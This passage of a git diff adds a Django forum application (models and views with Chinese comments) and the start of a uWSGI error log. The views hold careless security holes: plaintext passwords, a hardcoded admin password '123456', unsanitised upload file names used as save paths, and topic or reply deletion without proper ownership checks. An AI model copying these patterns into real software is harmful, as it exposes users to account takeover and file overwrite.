b/master/app01/migrations/__pycache__/0001_initial.cpython-37.pyc differ diff --git a/master/app01/migrations/__pycache__/0002_auto_20190703_0151.cpython-36.pyc b/master/app01/migrations/__pycache__/0002_auto_20190703_0151.cpython-36.pyc new file mode 100644 index 0000000..42f4f99 Binary files /dev/null and b/master/app01/migrations/__pycache__/0002_auto_20190703_0151.cpython-36.pyc differ diff --git a/master/app01/migrations/__pycache__/0002_auto_20190703_0151.cpython-37.pyc b/master/app01/migrations/__pycache__/0002_auto_20190703_0151.cpython-37.pyc new file mode 100644 index 0000000..f753a6b Binary files /dev/null and b/master/app01/migrations/__pycache__/0002_auto_20190703_0151.cpython-37.pyc differ diff --git a/master/app01/migrations/__pycache__/0003_auto_20190703_0259.cpython-36.pyc b/master/app01/migrations/__pycache__/0003_auto_20190703_0259.cpython-36.pyc new file mode 100644 index 0000000..470ee22 Binary files /dev/null and b/master/app01/migrations/__pycache__/0003_auto_20190703_0259.cpython-36.pyc differ diff --git a/master/app01/migrations/__pycache__/0003_auto_20190703_0259.cpython-37.pyc b/master/app01/migrations/__pycache__/0003_auto_20190703_0259.cpython-37.pyc new file mode 100644 index 0000000..4e9866a Binary files /dev/null and b/master/app01/migrations/__pycache__/0003_auto_20190703_0259.cpython-37.pyc differ diff --git a/master/app01/migrations/__pycache__/0004_topic_t_like.cpython-36.pyc b/master/app01/migrations/__pycache__/0004_topic_t_like.cpython-36.pyc new file mode 100644 index 0000000..215b86a Binary files /dev/null and b/master/app01/migrations/__pycache__/0004_topic_t_like.cpython-36.pyc differ diff --git a/master/app01/migrations/__pycache__/0004_topic_t_like.cpython-37.pyc b/master/app01/migrations/__pycache__/0004_topic_t_like.cpython-37.pyc new file mode 100644 index 0000000..ce547c9 Binary files /dev/null and b/master/app01/migrations/__pycache__/0004_topic_t_like.cpython-37.pyc differ diff --git a/master/app01/migrations/__pycache__/__init__.cpython-36.pyc b/master/app01/migrations/__pycache__/__init__.cpython-36.pyc new file mode 100644 index 0000000..cfea7d0 Binary files /dev/null and b/master/app01/migrations/__pycache__/__init__.cpython-36.pyc differ diff --git a/master/app01/migrations/__pycache__/__init__.cpython-37.pyc b/master/app01/migrations/__pycache__/__init__.cpython-37.pyc new file mode 100644 index 0000000..8d3a7fd Binary files /dev/null and b/master/app01/migrations/__pycache__/__init__.cpython-37.pyc differ diff --git a/master/app01/models.py b/master/app01/models.py new file mode 100644 index 0000000..c668f07 --- /dev/null +++ b/master/app01/models.py @@ -0,0 +1,46 @@ +from django.db import models + + +# Create your models here. + +# 用户表 +class User(models.Model): + uid = models.CharField(verbose_name='电话/用户号', max_length=16, unique=True) + password = models.CharField(verbose_name='密码', max_length=16) + create_time = models.DateField(verbose_name='创建时间', auto_now_add=True) + + +# 帖子表 +class Topic(models.Model): + #t_id = models.CharField(verbose_name='帖子id', max_length=16) + t_uid = models.CharField(verbose_name='帖子所属用户id', max_length=16) + t_kind = models.CharField(verbose_name='类别', max_length=32) + create_time = models.DateField(verbose_name='创建时间', auto_now_add=True) + t_photo = models.CharField(verbose_name='帖子图片', max_length=128, null=True) + t_content = models.CharField(verbose_name='帖子正文', max_length=3000) + t_title = models.CharField(verbose_name='帖子标题', max_length=64) + t_introduce = models.CharField(verbose_name='帖子简介', max_length=256) + recommend = models.BooleanField(verbose_name='是否推荐', default=False) + t_like = models.IntegerField(verbose_name='点赞数量',default=0) + + +# 回复表 +class Reply(models.Model): + r_tid = models.CharField(verbose_name='帖子id', max_length=16) + r_uid = models.CharField(verbose_name='发表者id', max_length=16) + r_photo = models.CharField(verbose_name='回复的图片', max_length=128, null=True) + r_time = models.DateField(verbose_name='留言时间', auto_now_add=True) + r_content = models.CharField(verbose_name='回复内容', max_length=256) + + +# 分类表 +class Kind(models.Model): + # k_id = models.CharField(verbose_name='分类id', max_length=16) + k_name = models.CharField(verbose_name='分类名称', max_length=16) + + +# 公告表 +class Announcement(models.Model): + # a_id = models.CharField(verbose_name='公告id', max_length=16) + a_title = models.CharField(verbose_name='公告标题', max_length=64) + a_content = models.CharField(verbose_name='公告内容', max_length=3000, null=True) diff --git a/master/app01/tests.py b/master/app01/tests.py new file mode 100644 index 0000000..7ce503c --- /dev/null +++ b/master/app01/tests.py @@ -0,0 +1,3 @@ +from django.test import TestCase + +# Create your tests here. diff --git a/master/app01/views.py b/master/app01/views.py new file mode 100644 index 0000000..345a952 --- /dev/null +++ b/master/app01/views.py @@ -0,0 +1,565 @@ +from django.http import HttpResponse +from django.shortcuts import render, redirect +from app01 import models +import json + + +# Create your views here. + +# 主页 +def home(request): + if request.method == 'GET': + response = {} + + # top 10(公告)的处理,筛选10个也要改 + announcements = models.Announcement.objects.filter() + # 把这10个公告封装成字典 + a_list = [] + for a in announcements: + dic = {'a_id': a.id, 'a_title': a.a_title} + a_list.append(dic) + # 把列表装进回复字典里 + n = 10 if len(a_list) < 10 else len(a_list) + + response['a_list'] = a_list[::-1][0:n-1] + + # 帖子推荐列表,推荐8个帖子,推荐8个要改 + recommends = models.Topic.objects.filter(recommend=True) + # 推荐列表 + r_list = [] + + for t in recommends: + dic = {'t_id': t.id, 't_title': t.t_title, 't_introduce': t.t_introduce, 't_photo': t.t_photo} + r_list.append(dic) + # 把列表装进response + response['r_list'] = r_list + + # 把uid装进返回字典里 + response['uid'] = request.session['uid'] + + # 把所有类别装入返回字典里 + kinds = models.Kind.objects.filter() + response['kinds'] = kinds + + return render(request, 'home.html', response) + + +# 所有帖子 +def all_tie(request, kid, reply_limit, time_limit): + uid = request.session.get('uid') + if request.method == 'GET': + kinds = models.Kind.objects.filter() + if kid == '0' and reply_limit == '0' and time_limit == '0': + # 默认时间排序把帖子传过去 + topics = models.Topic.objects.filter() + else: + # request.path_info # 获取当前url + # from django.urls import reverse + # reverse('all_tie', kwargs={'kid': '0', 'reply_limit': '0', 'time_limit': '0'}) + + topics = models.Topic.objects.filter() + + # 筛选分类 + if kid != '0': + topics = models.Topic.objects.filter(t_kind=kid) + + # 筛选回复数量 + tmp = [] + for topic in topics: + # 查看每个帖子的回复数量 + count = len(models.Reply.objects.filter(r_tid=topic.id)) + # print(count) + print(reply_limit) + if reply_limit == '0': + pass + elif reply_limit == '1': # 1是大于100 + print('到1了') + if count < 100: + print('到了') + continue + elif reply_limit == '2': # 2是30-100 + if count < 30 or count > 100: + continue + elif reply_limit == '3': # 3是小于30 + if count > 30: + continue + tmp.append(topic) + topics = tmp + print(topics) + + # 筛选发布时间 + tmp = [] + for topic in topics: + if time_limit == '0': # 0是全部时间 + pass + elif time_limit == '1': # 1是1个月内 + # 如果在限制之前,就筛掉 + pass + elif time_limit == '2': # 2是3个月内 + # 如果在限制之前,就筛掉 + pass + elif time_limit == '3': # 3是6个月内 + # 如果在限制之前,就筛掉 + pass + elif time_limit == '4': # 4是1年内 + # 如果在限制之前,就筛掉 + pass + tmp.append(topic) + topics = tmp + + response = { + 'topics': topics, + 'kinds': kinds, + 'kid': kid, + 'time_limit': time_limit, + 'reply_limit': reply_limit, + 'uid': uid, + } + return render(request, 'all.html', response) + + elif request.method == 'POST': + # 搜索接收一个字段,查询标题或者简介里有关键字的帖子 + keys = request.POST.get('keys') + # 按关键字查询标题里含有关键字的 + topics = models.Topic.objects.filter(t_title__icontains=keys) + + kinds = models.Kind.objects.filter() + return render(request, 'all.html', {'topics': topics, 'kinds': kinds, 'uid': uid}) + +def ownpublish(request, kid, reply_limit, time_limit): + uid = request.session.get('uid') + if request.method == 'GET': + kinds = models.Kind.objects.filter() + if kid == '0' and reply_limit == '0' and time_limit == '0': + # 默认时间排序把帖子传过去 + topics = models.Topic.objects.filter(t_uid = uid) + else: + # request.path_info # 获取当前url + # from django.urls import reverse + # reverse('all_tie', kwargs={'kid': '0', 'reply_limit': '0', 'time_limit': '0'}) + + topics = models.Topic.objects.filter(t_uid = uid) + + # 筛选分类 + if kid != '0': + topics = models.Topic.objects.filter(t_kind=kid,t_uid = uid) + + # 筛选回复数量 + tmp = [] + for topic in topics: + # 查看每个帖子的回复数量 + count = len(models.Reply.objects.filter(r_tid=topic.id)) + # print(count) + print(reply_limit) + if reply_limit == '0': + pass + elif reply_limit == '1': # 1是大于100 + print('到1了') + if count < 100: + print('到了') + continue + elif reply_limit == '2': # 2是30-100 + if count < 30 or count > 100: + continue + elif reply_limit == '3': # 3是小于30 + if count > 30: + continue + tmp.append(topic) + topics = tmp + print(topics) + + # 筛选发布时间 + tmp = [] + for topic in topics: + if time_limit == '0': # 0是全部时间 + pass + elif time_limit == '1': # 1是1个月内 + # 如果在限制之前,就筛掉 + pass + elif time_limit == '2': # 2是3个月内 + # 如果在限制之前,就筛掉 + pass + elif time_limit == '3': # 3是6个月内 + # 如果在限制之前,就筛掉 + pass + elif time_limit == '4': # 4是1年内 + # 如果在限制之前,就筛掉 + pass + tmp.append(topic) + topics = tmp + + response = { + 'topics': topics, + 'kinds': kinds, + 'kid': kid, + 'time_limit': time_limit, + 'reply_limit': reply_limit, + 'uid': uid, + } + return render(request, 'ownpublish.html', response) + + elif request.method == 'POST': + type1 = request.POST.get('type1') + if type1 == 'owndelete': + tid = request.POST.get('tid') + # 刪除帖子 + response = {'msg': '', 'status': False} + r_id = request.POST.get('r_id') + models.Topic.objects.filter(id=tid).delete() + response['status'] = True + return HttpResponse(json.dumps(response)) + else: + # 搜索接收一个字段,查询标题或者简介里有关键字的帖子 + keys = request.POST.get('keys') + # 按关键字查询标题里含有关键字的 + topics = models.Topic.objects.filter(t_title__icontains=keys,t_uid = uid) + + kinds = models.Kind.objects.filter() + return render(request, 'ownpublish.html', {'topics': topics, 'kinds': kinds, 'uid': uid}) + +# 登录 +def login(request): + if request.method == 'GET': + return render(request, 'login.html') + elif request.method == 'POST': + # 验证用户名密码是否正确,然后登陆存入session + type = request.POST.get('type') + response = {'msg': '', 'status': False} + + + uid = request.POST.get('uid') + pwd = request.POST.get('pwd') + if type == 'login': + if len(models.User.objects.filter(uid=uid, password=pwd)) != 0: + # 登录成功 + response['status'] = True + request.session['uid'] = uid + return HttpResponse(json.dumps(response)) + pass + else: + # 登录失败 + response['msg'] = '用户名或者密码错误' + return HttpResponse(json.dumps(response)) + pass + elif type == 'register': + models.User.objects.create(uid=uid, password=pwd) + response['status'] = True + request.session['uid'] = uid + return HttpResponse(json.dumps(response)) + + +# 注册 +def register(request): + if request.method == 'POST': + # 判断是否已有 + uid = request.POST.get('uid') + pwd = request.POST.get('pwd') + if len(models.User.objects.filter(uid=uid)) != 0: + # 已被创建,返回错误 + return render(request, 'login.html', {'message': '用户名已被创建'}) + else: + # 插入数据 + user = { + 'uid': uid, + 'password': pwd, + } + models.User.objects.create(**user) + return redirect('/home') + + +# 发布页 +def publish(request): + if request.method == 'GET': + kinds = models.Kind.objects.filter() + response = { + 'kinds': kinds + } + return render(request, 'publish.html', response) + elif request.method == 'POST': + # session获取uid + uid = request.session['uid'] + # 提交发布的文章 + t_title = request.POST.get('t_title') + t_introduce = request.POST.get('t_introduce') + t_content = request.POST.get('t_content') + t_kind = request.POST.get('t_kind') + print(t_title, t_introduce) + + obj = models.Topic.objects.create(t_title=t_title, t_introduce=t_introduce, + t_content=t_content, t_kind=t_kind, t_uid=uid) + t_id = obj.id + + # 存帖子图片 + t_photo = request.FILES.get('t_photo', None) + #t_photo_path = 'static/img/t_photo/' + str(t_id) + '_' + t_photo.name + + if t_photo: + t_photo_path = 'static/img/t_photo/' + str(t_id) + '_' + t_photo.name + # 保存文件 + import os + f = open(os.path.join(t_photo_path), 'wb') + for line in t_photo.chunks(): + f.write(line) + f.close() + else: + t_photo_path = 'static/img/t_photo/' + 'wrong.jpg' + # 吧图片路径存入数据库 + models.Topic.objects.filter(id=t_id).update(t_photo='/'+t_photo_path) + + return redirect('/single/' + str(t_id)) + + +# 单个帖子页面 +def single(request, tid): + if request.method == 'GET': + # 帖子内容 + # 时间类别作者,标题,正文,图片path + try: + topic = models.Topic.objects.get(id = tid) + except Exception as e: + return redirect('/home') + + t_time = topic.create_time + t_kind = topic.t_kind + # 根据类别 id 获得类别名称 + kind = models.Kind.objects.get(id = t_kind) + t_kind = kind.k_name + t_title = topic.t_title + t_content = topic.t_content + t_photo = topic.t_photo + t_uid = topic.t_uid + t_introduce = topic.t_introduce + t_like = topic.t_like + uid = request.session['uid'] + admin_uid = request.session.get('admin_uid') + + response = { + 'tid': tid, + 't_uid': t_uid, + 't_time': t_time, + 't_kind': t_kind, + 't_title': t_title, + 't_content': t_content, + 't_photo': t_photo, + 't_introduce': t_introduce, + 'uid': uid, + 'admin_uid': admin_uid, + 't_like':t_like + } + + # 留言内容 + # 留言者,留言时间,留言内容 + replys = models.Reply.objects.filter(r_tid=tid) + reply_list = [] + for reply in replys: + single_reply = { + 'r_uid': reply.r_uid, + 'r_time': reply.r_time, + 'r_content': reply.r_content, + 'r_id': reply.id, + 'r_photo': reply.r_photo, + } + reply_list.append(single_reply) + response['reply_list'] = reply_list + + return render(request, 'single.html', response) + + elif request.method == 'POST': + type1 = request.POST.get('type1') + if type1 == 'like': + print("here") + tid = request.POST.get('tid') + response = {'msg': '', 'status': False} + # 点赞数量增加 1 + orignal_like = models.Topic.objects.get(id=tid).t_like + models.Topic.objects.filter(id=tid).update(t_like=orignal_like + 1) + response['status'] = True + return HttpResponse(json.dumps(response)) + # 判断是否登录 + uid = request.session.get('uid') + + # 删除回复,管理员才可以删除 + p_type = request.POST.get('type2') + if p_type == 'delete': + response = {'msg': '', 'status': False} + r_id = request.POST.get('r_id') + uid = request.POST.get('uid') + r_uid = models.Reply.objects.get(id=r_id).r_uid + if uid == r_uid: + models.Reply.objects.filter(id=r_id).delete() + response['status'] = True + return HttpResponse(json.dumps(response)) + + if not uid: + return redirect('/login') + # 进行回复 + r_content = request.POST.get('r_content') + + # 提交数据库 + obj = models.Reply.objects.create(r_tid=tid,r_uid=uid,r_content=r_content) + + r_id = str(obj.id) + r_photo = request.FILES.get('r_photo') + if r_photo: + # 保存文件 + r_photo_path = 'static/img/r_photo/' + r_id + '_' + r_photo.name + import os + f = open(os.path.join(r_photo_path), 'wb') + for line in r_photo.chunks(): + f.write(line) + f.close() + models.Reply.objects.filter(id=r_id).update(r_photo='/'+r_photo_path) + #else: + #r_photo_path = 'static/img/t_photo/' + 'hungry.png' + + # 吧图片路径存入数据库 + #models.Reply.objects.filter(id=r_id).update(r_photo='/'+r_photo_path) + return redirect('/single/' + tid) + + +# 修改密码页面 +def edit_pwd(request): + if request.method == 'GET': + uid = request.session.get('uid') + return render(request, 'edit-pwd.html', {'uid': uid}) + + if request.method == 'POST': + uid = request.session.get('uid') + old = request.POST.get('old_pwd') + new1 = request.POST.get('new_pwd1') + new2 = request.POST.get('new_pwd2') + if new1 == new2 and len(models.User.objects.filter(uid=uid, password=old)) != 0: + # 核对成功,修改密码 + models.User.objects.filter(uid=uid).update(password=new1) + return redirect('/home') + + +# 管理员登录 +def admin(request): + if request.method == 'GET': + return render(request, 'admin.html') + elif request.method == 'POST': + admin_uid = request.POST.get('admin_id') + admin_pwd = request.POST.get('admin_pwd') + + response = {'msg': '', 'status': False} + + if admin_uid == 'guanliyuan' and admin_pwd == '123456': + # 管理员登录成功 + response['status'] = True + request.session['admin_uid'] = 'guanliyuan' + return HttpResponse(json.dumps(response)) + else: + response['msg'] = '用户名或者密码错误' + return HttpResponse(json.dumps(response)) + + +# 公告管理 +def announcement(request): + if not request.session.get('admin_uid'): + return redirect('/my-admin') + + # 查询所有公告 + if request.method == 'GET': + + announcements = models.Announcement.objects.filter() + response = {'announcements': announcements} + return render(request, 'announcement.html', response) + + # 发公告,删公告 + elif request.method == 'POST': + p_type = request.POST.get('type') + response = {'msg': '', 'status': False} + if p_type == 'delete': + a_id = request.POST.get('a_id') + models.Announcement.objects.filter(id=a_id).delete() + response['status'] = True + elif p_type == 'create': + # 添加一条公告 + a_title = request.POST.get('a_title') + a_content = request.POST.get('a_content') + models.Announcement.objects.create(a_title=a_title, a_content=a_content) + response['status'] = True + return HttpResponse(json.dumps(response)) + + +# 帖子管理:标题,简介,时间, +def topic_manage(request): + if not request.session.get('admin_uid'): + return redirect('/my-admin') + + if request.method == 'GET': + topics = models.Topic.objects.filter() + response = { + 'topics': topics, + } + return render(request, 'admin-home.html', response) + elif request.method == 'POST': + p_type = request.POST.get('type') + response = {'msg': '', 'status': False} + print(p_type) + # 删除帖子 + if p_type == 'delete': + t_id = request.POST.get('t_id') + models.Topic.objects.filter(id=t_id).delete() + response['status'] = True + # 置顶(推荐) + if p_type == 'zhiding': + print('置顶') + t_id = request.POST.get('t_id') + models.Topic.objects.filter(id=t_id).update(recommend=True) + response['status'] = True + # 取消置顶(推荐) + if p_type == 'qzhiding': + t_id = request.POST.get('t_id') + models.Topic.objects.filter(id=t_id).update(recommend=False) + response['status'] = True + return HttpResponse(json.dumps(response)) + + +# 类别管理(板块管理) +def kind_manage(request): + # 验证登录 + if not request.session.get('admin_uid'): + return redirect('/my-admin') + + if request.method == 'GET': + # get返回所有类别(板块) + kinds = models.Kind.objects.filter() + response = { + 'kinds': kinds, + } + return render(request, 'kind-manage.html', response) + if request.method == 'POST': + p_type = request.POST.get('type') + response = {'msg': '', 'status': False} + # 删除类别 + if p_type == 'delete': + k_id = request.POST.get('k_id') + models.Kind.objects.filter(id=k_id).delete() + response['status'] = True + + # 添加类别 + if p_type == 'create': + k_name = request.POST.get('k_name') + models.Kind.objects.create(k_name=k_name) + response['status'] = True + + return HttpResponse(json.dumps(response)) + + +# 公告页面 +def single_an(request, aid): + if request.method == 'GET': + try: + an = models.Announcement.objects.get(id=aid) + except Exception as e: + return '/home' + a_title = an.a_title + a_content = an.a_content + + response = { + 'a_title': a_title, + 'a_content': a_content, + } + return render(request, 'single-an.html', response) diff --git a/master/logs/error.log b/master/logs/error.log new file mode 100644 index 0000000..a723128 --- /dev/null +++ b/master/logs/error.log @@ -0,0 +1,19588 @@ +*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:09:36 2021] *** +compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04 +os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 +nodename: VM-0-13-centos +machine: x86_64 +clock source: unix +pcre jit disabled +detected number of CPU cores: 1 +current working directory: / +detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /www/wwwroot/master +your processes number limit is 7269 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on 0.0.0.0:8080 fd 4 +uwsgi socket 0 bound to TCP address 127.0.0.1:36114 (port auto-assigned) fd 3 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)] +Python main interpreter initialized at 0x15c8870 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +python threads support enabled +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 166752 bytes (162 KB) for 2 cores +*** Operational MODE: threaded *** +ModuleNotFoundError: No module named 'master' +unable to load app 0 (mountpoint='') (callable not found or import error) +open("/www/wwwroot/master//__init__.py"): No such file or directory [plugins/python/python_plugin.c line 464] +unable to load app 0 (mountpoint='') (callable not found or import error) +*** no app loaded. going in full dynamic mode *** +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 13736) +spawned uWSGI worker 1 (pid: 13737, cores: 2) +spawned uWSGI http 1 (pid: 13738) +Fri Jan 8 21:10:14 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!! +*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:18:42 2021] *** +compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04 +os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 +nodename: VM-0-13-centos +machine: x86_64 +clock source: unix +pcre jit disabled +detected number of CPU cores: 1 +current working directory: / +detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /www/wwwroot/master +your processes number limit is 7269 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +!!! no /etc/mime.types file found !!! +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on 0.0.0.0:8080 fd 4 +uwsgi socket 0 bound to TCP address 127.0.0.1:46350 (port auto-assigned) fd 3 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)] +Python main interpreter initialized at 0x21259c0 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +python threads support enabled +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 seconds +mapped 166752 bytes (162 KB) for 2 cores +*** Operational MODE: threaded *** +ModuleNotFoundError: No module named 'master' +unable to load app 0 (mountpoint='') (callable not found or import error) +WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x21259c0 pid: 15209 (default app) +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +*** uWSGI is running in multiple interpreter mode *** +spawned uWSGI master process (pid: 15209) +spawned uWSGI worker 1 (pid: 15210, cores: 2) +spawned uWSGI http 1 (pid: 15211) +Not Found: / +[pid: 15210|app: 0|req: 1/1] 117.100.100.38 () {38 vars in 1206 bytes} [Fri Jan 8 13:19:09 2021] GET / => generated 3244 bytes in 18 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /favicon.ico +[pid: 15210|app: 0|req: 2/2] 117.100.100.38 () {38 vars in 1156 bytes} [Fri Jan 8 13:19:09 2021] GET /favicon.ico => generated 3295 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 15210|app: 0|req: 3/3] 117.100.100.38 () {38 vars in 1214 bytes} [Fri Jan 8 13:19:15 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +Internal Server Error: /home/ +Traceback (most recent call last): + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 38, in home + response['uid'] = request.session['uid'] + File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/contrib/sessions/backends/base.py", line 65, in __getitem__ + return self._session[key] +KeyError: 'uid' +[pid: 15210|app: 0|req: 4/4] 117.100.100.38 () {38 vars in 1216 bytes} [Fri Jan 8 13:19:15 2021] GET /home/ => generated 61812 bytes in 51 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1) +[pid: 15210|app: 0|req: 5/5] 117.100.100.38 () {38 vars in 1216 bytes} [Fri Jan 8 13:19:44 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0) +[pid: 15210|app: 0|req: 6/6] 117.100.100.38 () {38 vars in 1218 bytes} [Fri Jan 8 13:19:45 2021] GET /login/ => generated 6356 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15210|app: -1|req: -1/7] 117.100.100.38 () {38 vars in 1265 bytes} [Fri Jan 8 13:19:45 2021] GET /static/css/bootstrap-responsive.css => generated 20999 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15210|app: -1|req: -1/8] 117.100.100.38 () {38 vars in 1243 bytes} [Fri Jan 8 13:19:45 2021] GET /static/css/bootstrap.css => generated 118128 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 15210|app: -1|req: -1/9] 117.100.100.38 () {38 vars in 1245 bytes} [Fri Jan 8 13:19:45 2021] GET /static/css/flexslider.css => generated 3552 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15210|app: -1|req: -1/10] 117.100.100.38 () {38 vars in 1251 bytes} [Fri Jan 8 13:19:45 2021] GET /static/css/custom-styles.css => generated 20296 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15210|app: -1|req: -1/11] 117.100.100.38 () {38 vars in 1247 bytes} [Fri Jan 8 13:19:45 2021] GET /static/css/prettyPhoto.css => generated 26845 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15210|app: -1|req: -1/12] 117.100.100.38 () {38 vars in 1224 bytes} [Fri Jan 8 13:19:45 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15210|app: -1|req: -1/13] 117.100.100.38 () {38 vars in 1242 bytes} [Fri Jan 8 13:19:45 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15210|app: -1|req: -1/14] 117.100.100.38 () {38 vars in 1240 bytes} [Fri Jan 8 13:19:45 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 15210|app: -1|req: -1/15] 117.100.100.38 () {38 vars in 1232 bytes} [Fri Jan 8 13:19:46 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15210|app: -1|req: -1/16] 117.100.100.38 () {38 vars in 1286 bytes} [Fri Jan 8 13:19:48 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15210|app: -1|req: -1/17] 117.100.100.38 () {38 vars in 1292 bytes} [Fri Jan 8 13:19:48 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15210|app: -1|req: -1/18] 117.100.100.38 () {38 vars in 1260 bytes} [Fri Jan 8 13:19:48 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 15210|app: 0|req: 7/19] 117.100.100.38 () {40 vars in 1346 bytes} [Fri Jan 8 13:19:52 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0) +[pid: 15210|app: 0|req: 8/20] 117.100.100.38 () {40 vars in 1348 bytes} [Fri Jan 8 13:19:52 2021] GET /my-admin/ => generated 5294 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 15210|app: 0|req: 9/21] 117.100.100.38 () {40 vars in 1345 bytes} [Fri Jan 8 13:19:57 2021] GET /login/ => generated 6356 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Fri Jan 8 13:21:59 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!! +Fri Jan 8 13:21:59 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!! +*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:25:53 2021] *** +compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04 +os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 +nodename: VM-0-13-centos +machine: x86_64 +clock source: unix +pcre jit disabled +detected number of CPU cores: 1 +current working directory: / +detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +chdir() to /www/wwwroot/master +your processes number limit is 7269 +your memory page size is 4096 bytes +detected max file descriptor number: 1024 +!!! no /etc/mime.types file found !!! +lock engine: pthread robust mutexes +thunder lock: disabled (you can enable it with --thunder-lock) +uWSGI http bound on 0.0.0.0:8080 fd 4 +uwsgi socket 0 bound to TCP address 127.0.0.1:37543 (port auto-assigned) fd 3 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)] +Python main interpreter initialized at 0x1dd89c0 +uWSGI running as root, you can use --uid/--gid/--chroot options +*** WARNING: you are running uWSGI as root !!! (use the --uid flag) *** +python threads support enabled +your server socket listen backlog is limited to 100 connections +your mercy for graceful operations on workers is 60 